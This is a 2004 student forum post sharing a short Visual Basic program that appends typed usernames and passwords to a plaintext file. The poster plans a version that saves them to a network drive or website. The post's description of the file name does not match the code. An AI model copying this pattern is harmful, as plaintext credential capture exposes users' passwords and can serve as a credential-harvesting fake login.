Computer Science Canada

My logon prog

Author:  Skizzarz [ Mon Nov 08, 2004 8:17 pm ]
Post subject:  My logon prog

Hey guys, this is the prog i made in gr 10 comp sci. im now in gr 12, and this is the first version, ive made a second version that i lost and it was better, the first version will make a file called "up" (stands for username password if ur wondering) in the prog's folder. everytime u run the prog it overwrites the old text in the "up" file and its not a .txt file so u have to open with a text editor. its not very useful as is to u, but its just a demo, im making a new one that will be much better and save either on a network drive or on a website. tell me what u think. if ur gonna take the idea and modify it then plz post ur modification here, id love to see it, but i dont have the form for it so get the code for urself. but the basic code (taken almsot exactly from the tutorial forum is:

Private Sub Command1_Click()

Open "C:\up.txt" For Append As 1
Print #1, "Username:", user.Text, "Password:", pass.Text

Close 1

End Sub
